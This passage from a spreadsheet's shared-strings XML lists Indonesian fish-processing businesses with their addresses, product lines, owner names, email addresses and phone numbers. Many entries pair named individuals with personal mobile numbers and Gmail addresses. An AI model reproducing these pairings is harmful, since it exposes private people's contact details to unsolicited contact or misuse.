    <t>Lobster Beku, Ikan Asin Kering, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>FRENKIE SUSILO</t>
  </si>
  <si>
    <t>Cibinong</t>
  </si>
  <si>
    <t>intiyuda.samudra@gmail.com</t>
  </si>
  <si>
    <t>021-75675825</t>
  </si>
  <si>
    <t>PT. OCEANICA MEGAH UTAMA</t>
  </si>
  <si>
    <t>Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Salmon Beku, Trout Beku, Salmon Segar, Trout Segar, Ikan Demersal Beku, Ikan Demersal Segar, Udang Beku, Fillet Ikan Beku, Fillet Ikan Segar</t>
  </si>
  <si>
    <t>Indah</t>
  </si>
  <si>
    <t>salmon.oceanica@gmail.com</t>
  </si>
  <si>
    <t>Ishfi Aryahiyyah 081285978823</t>
  </si>
  <si>
    <t>PT. BAROKAH JAYA PERKASA</t>
  </si>
  <si>
    <t>Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Kering, Udang Segar, Udang Kering</t>
  </si>
  <si>
    <t>RAHMI JUMAIDA</t>
  </si>
  <si>
    <t>Bagan Kota</t>
  </si>
  <si>
    <t>ptbarokahjayaperkasa@gmail.com</t>
  </si>
  <si>
    <t>Haryono / 082385546560</t>
  </si>
  <si>
    <t>PT. GRAHA MEGATOP BORNEO</t>
  </si>
  <si>
    <t>Jl. AW Syaharani No.289, Kel. Air Hitam, Kec. Samarinda Ulu, Kota Samarinda</t>
  </si>
  <si>
    <t>Guan Lingyun</t>
  </si>
  <si>
    <t>marsaliamwarda@gmail.com</t>
  </si>
  <si>
    <t>Desa Halakodanuan, Kec. Ile Mandiri, Kabupaten Flores Timur</t>
  </si>
  <si>
    <t>Lukas Jon Papiernak</t>
  </si>
  <si>
    <t>Ile Mandiri</t>
  </si>
  <si>
    <t>Halakodanuan</t>
  </si>
  <si>
    <t>primoindoikan.ltk@gmail.com</t>
  </si>
  <si>
    <t>Hilmar Dayton U. &amp; 082237388632</t>
  </si>
  <si>
    <t>Andajani</t>
  </si>
  <si>
    <t>Jl. Soekarno Hatta, Dusun Balong RT 003 RW 005, Kel. Gebang Ilir, Kec. Gebang, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Didik Edysun</t>
  </si>
  <si>
    <t>Gebang Ilir</t>
  </si>
  <si>
    <t>pt.bmicirebon@gmail.com</t>
  </si>
  <si>
    <t>0231-664740</t>
  </si>
  <si>
    <t>Dididk Hari Santosa / 081265299967, Tedi 083120137215</t>
  </si>
  <si>
    <t>Didik Hari Santosa</t>
  </si>
  <si>
    <t>PT. PRIMA INDO BAHARI</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kepiting Beku, Udang Beku, Hiu Beku, Udang Segar, Kerang Beku</t>
  </si>
  <si>
    <t>ANTON WIJAYA</t>
  </si>
  <si>
    <t>ryan.hidayat0104@gmail.com</t>
  </si>
  <si>
    <t>021-6692697</t>
  </si>
  <si>
    <t>RIAN HIDAYAT</t>
  </si>
  <si>
    <t>CV. TRISNO LANGGENG</t>
  </si>
  <si>
    <t>Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Udang Beku, Udang Kupas Beku, Udang Segar, Cephalopoda Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>H. MOCHAMAD RUSDI SUTEJO</t>
  </si>
  <si>
    <t>Bangil</t>
  </si>
  <si>
    <t>Kalianyar</t>
  </si>
  <si>
    <t>ahmed.baidlowi@gmail.com</t>
  </si>
  <si>
    <t>AHMAD BAIDLOWI 08113737577</t>
  </si>
  <si>
    <t>AHMAD BAIDLOWI</t>
  </si>
  <si>
    <t>KOPERASI SERBA USAHA NELAYAN BINTAN</t>
  </si>
  <si>
    <t>Kp. Kolam, Jl. Sei Enam GG Tarantua, Kel. Sei Enam, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>EKO PRIHANANTO</t>
  </si>
  <si>
    <t>Sei Enam</t>
  </si>
  <si>
    <t>koperasinelayanbintan@gmail.com</t>
  </si>
  <si>
    <t>EKO PRIHANANTO &amp; 0811704545</t>
  </si>
  <si>
    <t>PT. BERJAYA USAHA SAKTI</t>
  </si>
  <si>
    <t>Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Daging Kerang Rebus Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>A IE SAMAN</t>
  </si>
  <si>
    <t>haccp.berjayausahasakti@gmail.com</t>
  </si>
  <si>
    <t>061-42069228</t>
  </si>
  <si>
    <t>Herry Wijaya 08126570050</t>
  </si>
  <si>
    <t>HERRY WIJAYA</t>
  </si>
  <si>
    <t>PT. ASIA SEJAHTERA MINA Tbk</t>
  </si>
  <si>
    <t>Pergudangan Tiara Jabon Blok B7, Jl. Tambak Sawah, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>asm.id.buy@gmail.com</t>
  </si>
  <si>
    <t>Ivander &amp; 082199009545</t>
  </si>
  <si>
    <t>PT. SOEJASCH BALI</t>
  </si>
  <si>
    <t>Jl. Gunung Patas No.1, Kel. Padang Sambian Kelod, Kec. Denpasar Barat, Kota Denpasar</t>
  </si>
  <si>
    <t>Beku, Asap, Fermentasi</t>
  </si>
  <si>
    <t>Salmon Beku, Salmon Asap, Herring Acar Gulung</t>
  </si>
  <si>
    <t>Reinhold Jantzen</t>
  </si>
  <si>
    <t>Padang Sambian Kelod</t>
  </si>
  <si>
    <t>jakarta@soejasch.com</t>
  </si>
  <si>
    <t>0361-420811</t>
  </si>
  <si>
    <t>Ayu - 081236377226</t>
  </si>
  <si>
    <t>Robert Jantzen</t>
  </si>
  <si>
    <t>DAPUR Q</t>
  </si>
  <si>
    <t>Dusun Palam RT 002 RW 002, Kel. Sawah Baru, Kec. Kampa, Kabupaten Kampar</t>
  </si>
  <si>
    <t>Sarden Pouch</t>
  </si>
  <si>
    <t>Robi Yana Manik</t>
  </si>
  <si>
    <t>Kampa</t>
  </si>
  <si>
    <t>Sawah Baru</t>
  </si>
  <si>
    <t>dapurq.kampar@gmail.com</t>
  </si>
  <si>
    <t>Robi Yana Manik/082189382622</t>
  </si>
  <si>
    <t>GRAHA PRATAMA FISH</t>
  </si>
  <si>
    <t>Jl. Syech Ja'far 07, Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar</t>
  </si>
  <si>
    <t>H. Suhaimi, S.Pi, MMA</t>
  </si>
  <si>
    <t>XIII Koto Kampar</t>
  </si>
  <si>
    <t>Koto Mesjid</t>
  </si>
  <si>
    <t>grahapratamafish1@gmail.com</t>
  </si>
  <si>
    <t>H. Suhaimi, S.Pi, MMA/ 08127530830</t>
  </si>
  <si>
    <t>MINA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Peltu Syaidan Kp. Deling, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar</t>
  </si>
  <si>
    <t>Nursanti</t>
  </si>
  <si>
    <t>Bangkinang</t>
  </si>
  <si>
    <t>Desa Pulau Lawas</t>
  </si>
  <si>
    <t>minasejahtera.kampar@gmail.com</t>
  </si>
  <si>
    <t>Nursanti/085263459373</t>
  </si>
  <si>
    <t>AHMADI EMPAT SEHAT</t>
  </si>
  <si>
    <t>Dusun Kampung Godang RT 001 RW 002, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar</t>
  </si>
  <si>
    <t>Otak-Otak Ikan</t>
  </si>
  <si>
    <t>Zuliana</t>
  </si>
  <si>
    <t>ahmadiempatsehat@gmail.com</t>
  </si>
  <si>
    <t>Zuliana/ 085215705287</t>
  </si>
  <si>
    <t>PT. KAYA SAMUDRA GLOBAL</t>
  </si>
  <si>
    <t>Jl. Pergudangan Tambak Langon Indah No.27 Blok B-19, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Doris Lu Xin</t>
  </si>
  <si>
    <t>chymthr1711@gmail.com</t>
  </si>
  <si>
    <t>Surya 081334502848</t>
  </si>
  <si>
    <t>Anik Wijayati</t>
  </si>
  <si>
    <t>CV. MAMORA</t>
  </si>
  <si>
    <t>Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang</t>
  </si>
  <si>
    <t>Tuna Saku Beku, Steak Tuna Beku, Udang Kupas Beku, Fillet Salmon Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Akwila Hermanto Arbi</t>
  </si>
  <si>
    <t>Kalibanteng Kulon</t>
  </si>
  <si>
    <t>mamorasmg@gmail.com</t>
  </si>
  <si>
    <t>024 761 85 14</t>
  </si>
  <si>
    <t>Gilang , 0812 2636 7060</t>
  </si>
  <si>
    <t>Gilang Fajar Prasetya</t>
  </si>
  <si>
    <t>PUDUNG ANUGRAH</t>
  </si>
  <si>
    <t>Jl. Sungai Kampar, Sentra Pengolahan Hasil Perikanan, Kel. Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar</t>
  </si>
  <si>
    <t>Lumatan Daging, Kering</t>
  </si>
  <si>
    <t>Patin Bernilai Tambah Beku, Abon Patin, Patin Asin Beku</t>
  </si>
  <si>
    <t>Megawati</t>
  </si>
  <si>
    <t>Desa Koto Mesjid</t>
  </si>
  <si>
    <t>pudunganugrah@gmail.com</t>
  </si>
  <si>
    <t>Megawati/ 085278554133</t>
  </si>
  <si>
    <t>PT. BINTANG MEGAH JAYA PAPUA</t>
  </si>
  <si>
    <t>Jl. Tanjung Perak KM 9 No.3, Kel. Sawagumu, Kec. Sorong Utara, Kota Sorong</t>
  </si>
  <si>
    <t>CINTIYA DEWI</t>
  </si>
  <si>
    <t>Sorong Utara</t>
  </si>
  <si>
    <t>Sawagumu</t>
  </si>
  <si>
    <t>bintangmegahjayapapua@gmail.com</t>
  </si>
  <si>
    <t>CINTIYA/08114131302</t>
  </si>
  <si>
    <t>ATUM</t>
  </si>
  <si>
    <t>PT. KENCANA BINTANG TERANG</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng, Daging Rajungan Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>MOHAMMAD FIRDAUS</t>
  </si>
  <si>
    <t>kencanabintangterang@gmail.com</t>
  </si>
  <si>
    <t>Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Udang Segar, Rajungan Segar, Ikan Pelagis Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>koperasikerapu821@gmail.com</t>
  </si>
  <si>
    <t>PT. GERBANG BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Kepiting Beku, Udang Beku, Cephalopoda Beku, Tuna Beku, Daging Tuna Beku, Hiu Beku, Kerang Beku, Ikan Asin Kering, Ubur-Ubur Asin, Bandeng Beku, Pari Beku</t>
  </si>
  <si>
    <t>SANDY PONCO HERMAWAN</t>
  </si>
  <si>
    <t>gerbangbaharisejahtera@gmail.com</t>
  </si>
  <si>
    <t>021-22677988</t>
  </si>
  <si>
    <t>HERU SAPUTRA</t>
  </si>
  <si>
    <t>UD. LAUTAN PAPUA INDOTIMUR</t>
  </si>
  <si>
    <t>Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Steak Ikan Beku, Ikan Pelagis Beku, Tuna Loin Beku, Tuna Beku, Udang Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>ANTON WIJAYA LIAUW</t>
  </si>
  <si>
    <t>papuaindotimurud@yahoo.com</t>
  </si>
  <si>
    <t>ANTON/0811499118</t>
  </si>
  <si>
    <t>ANDRY WIJAYA</t>
  </si>
  <si>
    <t>PT. SNG SAMUDRA HIJAU</t>
  </si>
  <si>
    <t>Desa Talise, Kec. Likupang Barat, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Hiu Siska</t>
  </si>
  <si>
    <t>Likupang Barat</t>
  </si>
  <si>
    <t>Desa Talise</t>
  </si>
  <si>
    <t>sngsamudrahijau@gmail.com</t>
  </si>
  <si>
    <t>Rosali E. Lenak</t>
  </si>
  <si>
    <t>PT. BERKAH MUTIARA SELATAN</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur, Kel. Mertasinga, Kec. Cilacap Utara, Kabupaten Cilacap</t>
  </si>
  <si>
    <t>Ubur-Ubur Asin</t>
  </si>
  <si>
    <t>SUKAINAH</t>
  </si>
  <si>
    <t>Cilacap Utara</t>
  </si>
  <si>
    <t>Mertasinga</t>
  </si>
  <si>
    <t>pt.berkahmutiaraselatan@yahoo.com</t>
  </si>
  <si>
    <t>0282-5072987</t>
  </si>
  <si>
    <t>SUKAINAH (08122701206)</t>
  </si>
  <si>
    <t>Jl. Industri Modern III Kav 12 Kawasan Industri Modern Cikande, Kel. Nambo Ilir, Kec. Kibin, Kabupaten Serang</t>
  </si>
  <si>
    <t>Mochamad Najik</t>
  </si>
  <si>
    <t>Nambo Ilir</t>
  </si>
  <si>
    <t>septiadewi90@gmail.com</t>
  </si>
  <si>
    <t>0254-402481</t>
  </si>
  <si>
    <t>Dewi Septia 085320449355</t>
  </si>
  <si>
    <t>Joko Utomo</t>
  </si>
  <si>
    <t>SAKURA</t>
  </si>
  <si>
    <t>Lorong Enok, Kel. Kuala Enok, Kec. Tanah Merah, Kabupaten Indragiri Hilir</t>
  </si>
  <si>
    <t>Udang Ebi Kering</t>
  </si>
  <si>
    <t>Arianto</t>
  </si>
  <si>
    <t>Tanah Merah</t>
  </si>
  <si>
    <t>Kuala Enok</t>
  </si>
  <si>
    <t>sakura.inhil@gmail.com</t>
  </si>
  <si>
    <t>Arianto/ 085384885333</t>
  </si>
  <si>
    <t>PT. BANDENG JUWANA</t>
  </si>
  <si>
    <t>Jl. Pandanaran No.57 RT 001 RW 002, Kel. Randusari, Kec. Semarang Selatan, Kota Semarang</t>
  </si>
  <si>
    <t>Arif Honggowijoyo Kusmadi</t>
  </si>
  <si>
    <t>Semarang Selatan</t>
  </si>
  <si>
    <t>bandengjuwana@yahoo.com</t>
  </si>
  <si>
    <t>024-8311488</t>
  </si>
  <si>
    <t>Veronica Yuniati 08122870305, Eva Puri 085727777730</t>
  </si>
  <si>
    <t>CV. INDOJAYA MAKMURABADI</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Basuki Rahmat,SE</t>
  </si>
  <si>
    <t>ismail.indojaya@gmail.com</t>
  </si>
  <si>
    <t>Ismail Rosyat Nur &amp; 08111089617</t>
  </si>
  <si>
    <t>PT. MERDEKA BAHARI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Tegal Pemalang Km 11, Kel. Sidaharja, Kec. Suradadi, Kabupaten Tegal</t>
  </si>
  <si>
    <t>HUTRI AGUS MARDIKO</t>
  </si>
  <si>
    <t>Suradadi</t>
  </si>
  <si>
    <t>Sidaharja</t>
  </si>
  <si>
    <t>merdekabahari@gmail.com</t>
  </si>
  <si>
    <t>Arifin Jauhari SA &amp; 085229560785</t>
  </si>
  <si>
    <t>Kawasan Industri Candi Blok 22A, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang</t>
  </si>
  <si>
    <t>bandengjuwanaelrina@gmail.com</t>
  </si>
  <si>
    <t>Verovica Yuniati 08122870305, Eva Puri 085727777730</t>
  </si>
  <si>
    <t>HAFISHFOOD</t>
  </si>
  <si>
    <t>Jl. Arif Rahman Hakim RT 16, Kel. Simpang IV Sipin, Kec. Telanaipura, Kota Jambi</t>
  </si>
  <si>
    <t>Ahmad Febriansyah</t>
  </si>
  <si>
    <t>Simpang IV Sipin</t>
  </si>
  <si>
    <t>shanty.novieta@yahoo.com</t>
  </si>
  <si>
    <t>Ahmad Febriansyah HP 081274418734</t>
  </si>
  <si>
    <t>UD. MINA NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Mawar Indah No.10, Kel. Labuhan Dalam, Kec. Tanjung Senang, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Asap, Lainnya, Kering</t>
  </si>
  <si>
    <t>Lele Asap, Abon Ikan, Crispy Ikan</t>
  </si>
  <si>
    <t>a. paryanti</t>
  </si>
  <si>
    <t>Tanjung Senang</t>
  </si>
  <si>
    <t>Labuhan Dalam</t>
  </si>
  <si>
    <t>paryanti68@gmail.com</t>
  </si>
  <si>
    <t>a. paryanti &amp; 0895636547230</t>
  </si>
  <si>
    <t>CV. DIAN SAMUDRA</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Nusantara Ambon, Jl. Sultan Hasanudin, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>Bakri</t>
  </si>
  <si>
    <t>cv.diansamudra@gmail.com</t>
  </si>
  <si>
    <t>Erlin 081343105543</t>
  </si>
  <si>
    <t>NGATA ANATA</t>
  </si>
  <si>
    <t>BTN Palupi Blok BS 2 No.11, Kel. Palupi, Kec. Tatanga, Kota Palu</t>
  </si>
  <si>
    <t>MASNIAR</t>
  </si>
  <si>
    <t>Tatanga</t>
  </si>
  <si>
    <t>Palupi</t>
  </si>
  <si>
    <t>ukmngataanata@gmail.com</t>
  </si>
  <si>
    <t>Masniar 085256337906</t>
  </si>
  <si>
    <t>CV. 3 BERKAT MURNI BARA</t>
  </si>
  <si>
    <t>Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Tuna Loin Segar, Lobster Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>Pety Fatimah</t>
  </si>
  <si>
    <t>tigaberkatmurni@gmail.com</t>
  </si>
  <si>
    <t>081342579108 / 081938889808</t>
  </si>
  <si>
    <t>Pety Fatimah &amp; 081342579108</t>
  </si>
  <si>
    <t>CV. KERITCU SUPER SINDI</t>
  </si>
  <si>
    <t>Jl. RE Martadinata No.09 RT 005 RW 002, Kel. Opas Indah, Kec. Taman Sari, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Kerupuk Telur Cumi-Cumi</t>
  </si>
  <si>
    <t>NUR RIZKIANA</t>
  </si>
  <si>
    <t>Taman Sari</t>
  </si>
  <si>
    <t>Opas Indah</t>
  </si>
  <si>
    <t>sindikeritcu@gmail.com</t>
  </si>
  <si>
    <t>DUA PUTRI</t>
  </si>
  <si>
    <t>RT 05 RW 02, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>SUDARTI</t>
  </si>
  <si>
    <t>duaputriukm@gmail.com</t>
  </si>
  <si>
    <t>SUDARTI  082231074108</t>
  </si>
  <si>
    <t>PT. BARUNA SEGARA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Raya Pelabuhan No.8, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>RUSLI</t>
  </si>
  <si>
    <t>barunasegara299@gmail.com</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Hiu Beku, Udang Beku, Udang Kipas Beku, Pari Beku</t>
  </si>
  <si>
    <t>tonyhe_89@yahoo.co.id</t>
  </si>
  <si>
    <t>021-22676033</t>
  </si>
  <si>
    <t>ANTONI 081316633628</t>
  </si>
  <si>
    <t>BEREJO GALO ARO</t>
  </si>
  <si>
    <t>Desa Aro RT 01, Kec. Muara Bulian, Kabupaten Batang Hari</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Stik Ikan</t>
  </si>
  <si>
    <t>ERMAYANTI</t>
  </si>
  <si>
    <t>Muara Bulian</t>
  </si>
  <si>
    <t>Aro</t>
  </si>
  <si>
    <t>ermayanti2205@gmail.com</t>
  </si>
  <si>
    <t>ERMAYANTI 082380367704</t>
  </si>
  <si>
    <t>CV. MULE JATI</t>
  </si>
  <si>
    <t>Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Kering, Segar, Lainnya</t>
  </si>
  <si>
    <t>Teripang Kering, Kepiting Segar, Ikan Demersal Segar, Lobster Hidup</t>
  </si>
  <si>
    <t>SAHMAN</t>
  </si>
  <si>
    <t>Pare Mas</t>
  </si>
  <si>
    <t>cv.mulejati@gmail.com</t>
  </si>
  <si>
    <t>SAHMAN ( 085338055165 )</t>
  </si>
  <si>
    <t>Pergudangan Fira 51, Jl. Kenjeran No.475-481 Kav 21No.40, Kel. Gading, Kec. Tambaksari, Kota Surabaya</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Minyak Hati Hiu</t>
  </si>
  <si>
    <t>Tambaksari</t>
  </si>
  <si>
    <t>Gading</t>
  </si>
  <si>
    <t>kiranahikari.sub@gmail.com</t>
  </si>
  <si>
    <t>AGENG RIZKY / 081216609559</t>
  </si>
  <si>
    <t>UD. SEAWEED SUKSES SEJAHTERA</t>
  </si>
  <si>
    <t>Kompleks Parangloe Indah Blok E3 No.10, Kel. Parangloe, Kec. Tamanlarea, Kota Makassar</t>
  </si>
  <si>
    <t xml:space="preserve">Robbyanto Rusli </t>
  </si>
  <si>
    <t>Tamanlarea</t>
  </si>
  <si>
    <t xml:space="preserve">Parangloe </t>
  </si>
  <si>
    <t>robbyantorusli@centralseaweed.com</t>
  </si>
  <si>
    <t>Robbyanto Rusli 0811416002</t>
  </si>
  <si>
    <t>Robbyanto Rusli</t>
  </si>
  <si>
    <t>PT. SAMUDERA JAYA PERKASA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis, Pergudangan Mutiara Kosambi 1 Blok A5 No.5, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>HANI</t>
  </si>
  <si>
    <t>samudrajayaperkasa019@gmail.com</t>
  </si>
  <si>
    <t>021-5558692</t>
  </si>
  <si>
    <t>UD. ALFIA</t>
  </si>
  <si>
    <t>RT 11 RW VI, Dusun Muarah, Kel. Padelegan, Kec. Pademawu, Kabupaten Pamekasan</t>
  </si>
  <si>
    <t>Teri Crispy</t>
  </si>
  <si>
    <t>HAIRUDDIN</t>
  </si>
  <si>
    <t>Pademawu</t>
  </si>
  <si>
    <t>Padelegan</t>
  </si>
  <si>
    <t>alfiapamekasan@gmail.com</t>
  </si>
  <si>
    <t>HAIRUDDIN   0823 3277 6599  RAHMA DISKANLA PAMEKASAN 0812 8612 4598</t>
  </si>
  <si>
    <t>UD. HIKMAH SAMUDERA</t>
  </si>
  <si>
    <t>RT 05 RW 01, Dusun Craken, Kel. Sumberharjo, Kec. Pacitan, Kabupaten Pacitan</t>
  </si>
  <si>
    <t>Lainnya, Kering, Beku</t>
  </si>
  <si>
    <t>Sambal Tuna, Serundeng Ikan , Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>FARADILA</t>
  </si>
  <si>
    <t>Sumberharjo</t>
  </si>
  <si>
    <t>udhikmahsamudera@gmail.com</t>
  </si>
  <si>
    <t>FARADILA  0853 3672 2063  DHIAN KURNIA W 0859 3217 1783</t>
  </si>
  <si>
    <t>CV. HASIL LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Lebak Rejo III A No.03 RT 003 RW 006, Kel. Dukuh Setro, Kec. Tambak Sari, Kota Surabaya</t>
  </si>
  <si>
    <t>RONALD MANUPUTTY</t>
  </si>
  <si>
    <t>Tambak Sari</t>
  </si>
  <si>
    <t>Dukuh Setro</t>
  </si>
  <si>
    <t>cvhalantra@gmail.com</t>
  </si>
  <si>
    <t>031-51500301</t>
  </si>
  <si>
    <t>RONALD MANUPUTTY-081357569191 , 082231018667</t>
  </si>
  <si>
    <t>PT. GRHA MINA WIJAYA</t>
  </si>
  <si>
    <t>Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Udang Segar, Kerang Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Jap Setiawan</t>
  </si>
  <si>
    <t>Sidakarya</t>
  </si>
  <si>
    <t>pt.grhaminawijaya@gmail.com</t>
  </si>
  <si>
    <t>0361-729061</t>
  </si>
  <si>
    <t>I Gusti Ayu Putri, 081236733941</t>
  </si>
  <si>
    <t>I Gusti Ayu Putri</t>
  </si>
  <si>
    <t>PT. LAUTAN SEJAHTERA GEMILANG</t>
  </si>
  <si>
    <t>Gudang Taman Niaga Sukajadi Blok E1 No.1, Kel. Sukajadi, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Le Ling</t>
  </si>
  <si>
    <t>Sukajadi</t>
  </si>
  <si>
    <t>PTLSGEMILANG@GMAIL.COM</t>
  </si>
  <si>
    <t>Hartono 082268881919</t>
  </si>
  <si>
    <t>CV. PUTRI DAHLIA</t>
  </si>
  <si>
    <t>Jl. Muara Baru No.01 RT 010 RW 017 (Room 4), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Dahlan</t>
  </si>
  <si>
    <t>znadziroh@gmail.com</t>
  </si>
  <si>
    <t>Dahlan / 08119999062</t>
  </si>
  <si>
    <t>Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Daging Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>nesiajayahutamajkt@gmail.com</t>
  </si>
  <si>
    <t>Wulan 089669810323</t>
  </si>
  <si>
    <t>ANDI WIDIYANTO</t>
  </si>
  <si>
    <t>TEK ENG</t>
  </si>
  <si>
    <t>Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga</t>
  </si>
  <si>
    <t>Kepiting Segar, Ikan Demersal Segar, Teri Kering, Cephalopoda Kering, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>TeK Eng Alias A Seng</t>
  </si>
  <si>
    <t>Lingga Utara</t>
  </si>
  <si>
    <t>Pancur</t>
  </si>
  <si>
    <t>tekengaliasaseng@gmail.com</t>
  </si>
  <si>
    <t>Tek Hia/085230028888</t>
  </si>
  <si>
    <t>KERIPIK CUMI NINA</t>
  </si>
  <si>
    <t>Jl. Baturusa Desa Serandang, Kel. Baturusa, Kec. Merawang, Kabupaten Bangka</t>
  </si>
  <si>
    <t>Keripik Cumi</t>
  </si>
  <si>
    <t>SUHERTINA</t>
  </si>
  <si>
    <t>Merawang</t>
  </si>
  <si>
    <t>Baturusa</t>
  </si>
  <si>
    <t>keripikcuminina@gmail.com</t>
  </si>
  <si>
    <t>SUHERTINA 082281149989</t>
  </si>
  <si>
    <t>SUI KENG</t>
  </si>
  <si>
    <t>Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Kepiting Segar, Teri Kering, Cephalopoda Kering</t>
  </si>
  <si>
    <t>suikeng334@gmail.com</t>
  </si>
  <si>
    <t>Sui Keng/ 085233958888</t>
  </si>
  <si>
    <t>UD. SEJAHTERA 1</t>
  </si>
  <si>
    <t>Desa Wai Muli Timur RT 002 RW 001, Kec. Rajabasa, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Ikan Asin Kering, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Helna Gustiana</t>
  </si>
  <si>
    <t>Rajabasa</t>
  </si>
  <si>
    <t>Wai Muli Timur</t>
  </si>
  <si>
    <t>Helnagustiana@gmail.com</t>
  </si>
  <si>
    <t>Helna Gustiana &amp; 082375054544</t>
  </si>
  <si>
    <t>POKLAHSAR IKAN BANDENG</t>
  </si>
  <si>
    <t>Dusun Otasek, Kel. Tanjung, Kec. Pademawu, Kabupaten Pamekasan</t>
  </si>
  <si>
    <t>Ikan Asap</t>
  </si>
  <si>
    <t xml:space="preserve">KARYANI </t>
  </si>
  <si>
    <t>Tanjung</t>
  </si>
  <si>
